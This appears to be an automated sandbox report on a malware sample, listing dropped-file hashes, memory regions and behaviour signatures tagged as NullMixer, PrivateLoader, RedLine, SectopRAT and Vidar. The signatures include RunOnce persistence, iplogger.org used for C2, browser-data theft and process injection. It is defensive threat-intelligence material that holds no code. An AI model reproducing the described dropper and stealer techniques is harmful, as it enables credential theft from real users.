SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/2924-255-0x0000000000400000-0x0000000002CC9000-memory.dmp

memory/1812-257-0x00000000008D0000-0x00000000008DE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/1368-261-0x000000013F2D0000-0x000000013F2E0000-memory.dmp

memory/2220-262-0x0000000007580000-0x000000000760C000-memory.dmp

memory/2220-263-0x00000000004A0000-0x00000000004BE000-memory.dmp

memory/2180-264-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2180-268-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2180-273-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2180-272-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2180-270-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2180-266-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2180-276-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2180-274-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS6A38.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 13de10665b57fec8d8b79d04d8b35c2f
SHA1 a8d7ceedd79ffb7d685fd18b0829674c799f7906
SHA256 190dd6f5991f7792f4ba7f20216598ecd07102b224771d1508d9dc1a286f8564
SHA512 71caa2d9e1edc7f38f223fbb3d08d2edbcff3e4ffbad7e362ab483541556115b2021152fedb34794b4888adb6b53d1c59af1f278d3acc0741a727c2c3360a62c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 82649a9f3b4e3091366cbc7f63511351
SHA1 3821de590c751d411fd219804c5fd29fd27e24ee
SHA256 1d97062ed6ee8cd5c214c4c13c87f27baf84d4f11410bf29eefaa8d6ce0ed965
SHA512 ef1f93d66e88a5c59b6fcdc60ad5c55d6752538ee229d7e4c369923d71dd26634255b2c48db1fbb7c8f8cd4e3fd91bff7d24dafb8805dfbd62666b6b73b1057b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ddac94e63a74d659e1cecf3ea8789d8
SHA1 d5522370a1bdce9c07ca7036dc527502778796e3
SHA256 c259f0d19ea8bf8a3f14a3faa1de2497836fef3b601f8188669d994384305be3
SHA512 b4ca64951dd77e6d180b5746a4251b9bedc4fdd0f19ca174c52cf4b433a4abb7a9af2dd474134adc502711196ea321ef9d2bdd50912abe3acbcef642c2c7d752

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c84378d4fa4bc3e522c422cfed58093b
SHA1 16f1f284fc287f28242e0c371b8605fe332b4993
SHA256 a4b04cb9a09b52d60acddb30b0c764b63cfe8206c220548b7fba85422e69df25
SHA512 f416ff32bce988ad7599884668e86cec9f3d2cf7c13fe060d2434b942f51196d0a27fd8f5a89bc2bde5f7e7455f5a756ecc46d9aa29bc0c02aba47ee19eb3b37

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 81408979fd80e12a53fcb7525c285ccb
SHA1 4270bb3e0855e4db70f9ca81ec3905e4f9311bf8
SHA256 79668c41168fc542b19323501c80d2c36d70f148131f6680bad60055176d633c
SHA512 a5222b9f4761f4767830204293fb25d3628e5e4ec4b790fd4688b1e338b342030b134c59a6db34954cd060ef5d0e872b7e7da2f5d89c862baab3fd864f580ad3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 23c158c9d25aad241448643ba1a746e4
SHA1 8be468203096ba7c90571f4b4491330e08f3bd50
SHA256 db9964839680fa1f6f0c1a0c6cb88a6607ef2517fdcc8cea9a9876ad65ac255d
SHA512 9c0a954d2b3a8e86f5908553ceafa038e3c0ed5e69d4c941c4d95893ff369de79aa0ec182b4a0501ec8fd83591b51f55c2a4673c9f617f742613db4f63ee0c08

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 4df1384b1fc81f0d7163f4368047be14
SHA1 f9c567dc5d2dbc3c0000bc4242411478cba5dd8d
SHA256 9420de15bf3ace1bbddf42d4846d7bb7288d1b38c566910af1765dcc6d066610
SHA512 25589d78ad0cd4aa2d162a69b7e606765b21c2f8fbd18b44b3d1b65229973ff1f889cc60600a2942df75acf1900caed69de4842bd31914f3200e1a3ac4420f6c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 89e9f05fca7033a60435132cdf236f6a
SHA1 1912a60b2fb7a6a67ffd6d0bd859fdeec550332c
SHA256 004c95a79f2a0f83ae3160557531235f51be38a32d9e2d2c85a604bf1edec8c8
SHA512 0357d9098a77c8cc1ba7c3a16a66b4a93169655fb894a9ce6eede63b3d3eeba40f4224921904bc8001a6e8900637ea97d155409e226db97deb6311adddf85fa0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3c49366c869cadba7dcf9ebae987f47c
SHA1 7c2af9f165c95d06e26301ee22c8734bf6235f62
SHA256 ede332f6ef41afd0b6b2577f1e4cc8ac431550ae0ee82e57100e33fa77667d9f
SHA512 96bad4025891fd7cd855c137df1848f0d56b1455a7dbbd77a0b244e89930dcc6548ce01888f0182911354942475ef453db779d3c47fdd88a34dabf20178db1c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3baea259b38579ae02a7f1bf4c47dc58
SHA1 13e39ef1e10eef7622e2c4623bf485602590e1a7
SHA256 0c16c1c3721396aedb5679098b191f86afbf77b507687132c9a587efb219eff3
SHA512 037a12f52f4a91a40a7b618bf1efb9a7c73edf008d3a6300ec5e138749c3f8abfa33e6b4b14b768704d419280c687c55f34fb55185188385a5b1fe12d5030f46

memory/1820-798-0x000000013FAB0000-0x000000013FAB6000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6fa7cc7e32792f2bd5eb365dee913111
SHA1 2f5bcada23bdbd29ac15ebba1d346d330ec3e069
SHA256 b2f0bc6fe8fa012c76a8228f03fd744c68aee4860c7e98656a78d12a8e405f19
SHA512 998a959831bc709087c993e70f63aca01a731f6eedcd7c2aa883b0539b5868bf544e992bcdfacdd219903a49be77c6c01f1a39b29e498cc1790dd47289d809b1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0849a5e89c779caabacd264908e12526
SHA1 bbbf8a5cc55217a46a053e7aeb9f9b4d1d740634
SHA256 958c0e6f4ac261c860c42030fdd47bbaff37c3d8540d9af794ccf9e482c12c3a
SHA512 634f83895cfedaff77694274a77610eb5a77856b9845945c855c01ec66049e6ffa08151c0811a17953bb54ff15a6fd15307497a8fa8b22248e37717913a62827

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 448718afe4872caa1273ca1849ef7f6b
SHA1 609d5e713ad07888208d1207dc2eaccece6a2d3d
SHA256 d7508d14132707d9e4912854c698a81de893e362ba7490cba82914725004445d
SHA512 c7fc961941c25befafc035116674054f80c91487bfb1b91f907ce7693367d7b6ba376591c09d1086b13b7ffb99045a59605b3d9a9889e46ce6ea6792351fa880

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f3874ddd874203f8ff57db4286d4eb86
SHA1 af812f80fbfc9697023ad0fa1214cf026fc4146a
SHA256 db1a4ff4868b57a288b057a83a8fac653aa4f236ef94b5473e458ea168110cd5
SHA512 68aadb4ff8b04daafcbd2f4fb88b17a41952944d0810d9b92e84a6e0f3a8671e40dafff668efe6af0b535214280b93384b93f48bdca4adcbbceb95c6102a4aaf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5c6f71a95cda67992a8cc542f37130f7
SHA1 1e7065ae92dfc3631effda95d9792246946a2b24
SHA256 df2d6ec4a1103d7bbf464b4cd3578d4bfac3c2dd9cff050ca1b015f08280e22f
SHA512 1e8325738bcaae5cd2ebc3783edf8107250ce7318a236a5db44668da280d9a9c1bb53744c331ebf0e215f3fc792dd09a21e1a84386bc7515c3c9dd86e8aeeb39

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 39b4dec67a67aa6c1a06a51e328ff56e
SHA1 2c52fa83a93b6e46f4963e0d6bdf5d2b328a6a2b
SHA256 42eede554139b41fe0aa655110b0be399731f25f82e3ee96c17900ece7e7d3ae
SHA512 7c0088f2ff3f9a3835d6dcc123fde5306ad8d5dd2961e5780ffd3ef702c59a7c428ba88fd89198fca45a4d8b51a0ae0793a0a3ecdf81b62505374d516ed9c62a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8fef8477f0d1c34f3bfdb23f2979b6f2
SHA1 954f78fd2a990abe15852ae0a7e79cbe1340d7cf
SHA256 7a1077bed9b634c0e3d6a9b8b850fa14caa8798ffd82b09423f07e55dcb3fda0
SHA512 70aadb5ac1cf1a1d73ee49cc06a28fc58de7a5cc2ffd15a9df4b4c8be7b622da511c7588872b7952c50a17ffb400ce2641d1b762a9d4896dc4a8157949c67974

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b718b35367e9104874de9814417d2d69
SHA1 3e024b18e7a017c496d2083cf0ee6a900813e17a
SHA256 c9f7682abd1a09e296a49faa3fa65b61eb8898f1581bb8a7baaa368da6472be0
SHA512 b1cdcf24cf61cdc95cead9cbfd48b57210d7cbc3a96f630d47222854d1e9507ee4c24bcda9bd76636b933c359410f7f0d614d46f502adfbf65187b12480f9135

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-07 09:15

Reported

2024-12-07 09:18

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3608 set thread context of 2460 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
